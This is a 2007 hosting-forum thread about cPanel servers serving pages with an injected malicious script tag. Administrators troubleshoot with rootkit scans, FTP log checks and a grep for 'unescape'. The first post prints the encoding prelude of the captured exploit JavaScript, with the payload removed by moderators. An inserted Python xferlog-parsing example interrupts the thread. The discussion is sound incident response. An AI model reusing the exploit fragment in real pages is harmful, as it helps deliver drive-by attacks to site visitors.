  1. #1

    Exclamation Linux servers having CPANEL - js virus hitting

    Hi All,


    Earlier this week, our users started reporting that they were getting ActiveX prompts for Microsoft Data Access Component installation. In addition some of them were getting hit by the RTSP bug (QuickTime) and some were getting the JS/Exploit-BO.gen alerts via McAfee. Upon troubleshooting, we see that irrespective of the page type (simple html, php, etc.) at times a script tag similar to the one below is inserted right after the <body> tag.

    <script language='JavaScript' type='text/javascript' src='shfuy.js'></script>

    The javascript file name changes and the problem only occurs at times. There is no set pattern to reproduce the problem although I have noticed that if I connect to the server via a new IP address from my DSL connection, I get the javascript in the source.

    I ran some sniffer traces on the server and my laptop. This showed that the javascript was being sent by the server. I was able to capture the javascript (contents of the javascript below).

    Solutions tried:
    I have checked for the filenames but they do not exist on the server.

    1) Have run chkrootkit and rootkit hunter - All clean
    2) Have run clamav - All clean


    I would appreciate it if anybody could provide some input on what we might be dealing with and how to resolve the problem.

    Javascript code:
    var arg="akmukvfd";
    var MU = "http://" + window.location.hostname + "/" + arg;
    var MH = '';
    for (i=0; i < MU.length; i++)
    {
    var b = MU.charCodeAt (i);
    MH = MH + b.toString (16);
    }
    MH = MH.toUpperCase();
    if (Math.round(MU.length/2) != (MU.length/2))
    {
    MH += '00';
    }

    var MR = '';
    for (i=0; i < MH.length; i += 4)
    {
    MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2);
    }

    var MU2 = "\"" + MU + "\"";
    var MR2 = "\"" + MR + "\"";

    var SB =
    <<removed encoded exploit>>

    document.write (SB);

    Thanks,
    Regards
    Rushik Shah
    Last edited by bear; 11-25-2007 at 09:59 PM. Reason: Pointless to help spread this

  2. #2
    Does anybody have the FTP information of all the accounts having this problem? It may be possible that a compromised computer was infecting those sites without its owner even knowing it.

  3. #3
    It's more than likely it was just a deface of the specific account. Doubtful that it's an end-user's system being exploited and then FTPing up the data, far too much effort

  4. #4
    Hi Jedito / David

    Thanks for your quick reply. Actually I already did this check

    I changed FTP passwords, but it still got affected again after 3-4 days.

    The fact of the matter is that almost all websites on the server are affected, mostly the index.html and .php files.

    Any clue?

    Thanks!
    Regards
    Rushik Shah

  5. #5
    Quote Originally Posted by David
    It's more than likely it was just a deface of the specific account. Doubtful that it's an end-user's system being exploited and then FTPing up the data, far too much effort

    There's a trojan which does this automatically: the trojan infects the computer and picks up the FTP address book of any FTP program installed on the computer, then sends it to the "hacker", who later uses it to upload the infected data. This happened to one of my resellers a while ago.

    To the OP: check the FTP logs of the affected accounts to see which files were uploaded, and check whether the IP uploading those files mismatches in all of them.

  6. #6
    Hi,

    Which platforms does this trojan infect? Do you know its name?

    Thanks,
    sash

  7. #7
    Is there a way to stop this from happening on a cpanel server?

  8. #8
    Looks like a buffer overflow JS exploit. NoScript stops it, but I would do this:

    find / -name '*.js' | xargs grep unescape

  9. #9
    The code is here: <<snipped>>
    Last edited by anon-e-mouse; 11-25-2007 at 09:04 PM.

  10. #10
    Also, check xferlog and see who uploaded it.
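Posts #5 and #10 suggest checking the FTP transfer log for who uploaded the modified files and whether the same address shows up across accounts. The following is an added example, not code from this thread, that parses wu-ftpd-style xferlog lines (the layout the FTP servers shipped with cPanel write) and lists hosts that uploaded index files into more than one account; the log lines are constructed and the function names are hypothetical.

```python
# Added example for this thread (not from the original posts): summarise
# completed FTP uploads from a wu-ftpd-style xferlog. Function names are
# hypothetical; the log lines below are constructed, not from a real server.
from collections import defaultdict

SAMPLE_XFERLOG = """\
Mon Nov 19 08:12:03 2007 1 192.0.2.10 5120 /home/acme/public_html/about.html b _ i r acme ftp 0 * c
Tue Nov 20 23:41:17 2007 1 198.51.100.77 4433 /home/acme/public_html/index.html b _ i r acme ftp 0 * c
Tue Nov 20 23:41:19 2007 1 198.51.100.77 2201 /home/acme/public_html/index.php b _ i r acme ftp 0 * c
Wed Nov 21 10:05:44 2007 1 192.0.2.10 7000 /home/acme/public_html/logo.gif b _ o r acme ftp 0 * c
Thu Nov 22 02:17:08 2007 1 198.51.100.77 3999 /home/beta/public_html/index.html b _ i r beta ftp 0 * c
Thu Nov 22 09:30:00 2007 1 203.0.113.5 1200 /home/beta/public_html/style.css b _ i r beta ftp 0 * i
"""

def parse_xferlog(text):
    """Yield one dict per log entry. Token layout (xferlog(5)): five date
    tokens, transfer-time, remote-host, size, file, transfer-type,
    special-action, direction (i=upload, o=download), access-mode,
    username, service, auth-method, auth-user-id, completion (c/i)."""
    for line in text.splitlines():
        f = line.split()
        if len(f) < 18:
            continue  # skip truncated or malformed entries
        yield {"time": " ".join(f[0:5]), "host": f[6], "file": f[8],
               "direction": f[11], "user": f[13], "status": f[17]}

def uploads_by_user(text):
    """Map FTP user -> {remote host -> [files]} for completed uploads only."""
    out = defaultdict(lambda: defaultdict(list))
    for rec in parse_xferlog(text):
        if rec["direction"] == "i" and rec["status"] == "c":
            out[rec["user"]][rec["host"]].append(rec["file"])
    return out

def shared_upload_hosts(text, names=("index.html", "index.php")):
    """Hosts that uploaded any of `names` (the files the thread says keep
    being replaced) into two or more different accounts. One address
    writing index files across accounts points at stolen FTP credentials
    rather than each owner updating their own site."""
    accounts = defaultdict(set)
    for user, hosts in uploads_by_user(text).items():
        for host, files in hosts.items():
            if any(p.rsplit("/", 1)[-1] in names for p in files):
                accounts[host].add(user)
    return {h: sorted(u) for h, u in accounts.items() if len(u) > 1}

if __name__ == "__main__":
    for host, users in shared_upload_hosts(SAMPLE_XFERLOG).items():
        print(f"{host} uploaded index files to accounts: {', '.join(users)}")
```

On a live server, read /var/log/xferlog (or wherever the FTP daemon writes it) into the text argument instead of the constructed sample.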

  11. #11
    To clarify, there is absolutely no evidence provided that this is at all isolated to cPanel even if it is in fact an issue.

  12. #12
    Don't paste code like that on a public forum.

  13. #13
    Quote Originally Posted by zacharooni
    Don't paste code like that on a public forum.
    It's already in the OP, just URI encoded.

  14. #14
    Quote Originally Posted by Procyon
    It's already in the OP, just URI encoded.
    Not any more. Let's try not to feed the "kiddies".

  15. #15
    Hello Rushik,

    I can second your findings. The exploit appears all the time on different pages (the page indicated by KIS keeps changing, usually HTML) and it doesn't appear twice for the same IP and this seems to me to be related to IE only. Have you discovered anything new?

    Looks like a buffer overflow JS exploit. NoScript stops it, but I would do this:

    find / -name '*.js' | xargs grep unescape
    There is usually NO unescape(), no eval(), no iframe anywhere on the affected accounts. The .js file (this also changes) doesn't even exist anywhere on the server. It's like Trojan-Downloader.JS.Small.fs gets generated on the fly (in our case it tries to download an Exploit.HTML.IESlice.n from <<removed>>).

    Any clue anyone?

    Thanks and regards!
    Last edited by bear; 11-28-2007 at 07:27 AM.
